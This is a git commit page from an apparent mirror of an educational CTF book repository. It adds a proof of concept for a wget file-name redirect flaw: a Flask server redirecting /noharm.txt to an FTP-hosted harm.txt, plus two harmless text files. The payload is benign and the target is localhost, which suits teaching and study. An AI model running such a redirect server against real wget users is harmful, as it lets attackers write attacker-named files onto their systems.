mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2025-06-24 04:05:03 +07:00
finish 7.1.3
This commit is contained in:
1
src/exploit/7.1.3_wget_2016-4971/harm.txt
Normal file
1
src/exploit/7.1.3_wget_2016-4971/harm.txt
Normal file
@ -0,0 +1 @@
|
||||
"you've been hacked"
|
11
src/exploit/7.1.3_wget_2016-4971/httpServer.py
Normal file
11
src/exploit/7.1.3_wget_2016-4971/httpServer.py
Normal file
@ -0,0 +1,11 @@
|
||||
#!/usr/bin/env python
|
||||
from flask import Flask, redirect
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
@app.route("/noharm.txt")
|
||||
def test():
|
||||
return redirect("ftp://127.0.0.1/harm.txt")
|
||||
|
||||
if __name__ == "__main__":
|
||||
app.run(host="0.0.0.0",port=80)
|
1
src/exploit/7.1.3_wget_2016-4971/noharm.txt
Normal file
1
src/exploit/7.1.3_wget_2016-4971/noharm.txt
Normal file
@ -0,0 +1 @@
|
||||
"hello world"
|
Reference in New Issue
Block a user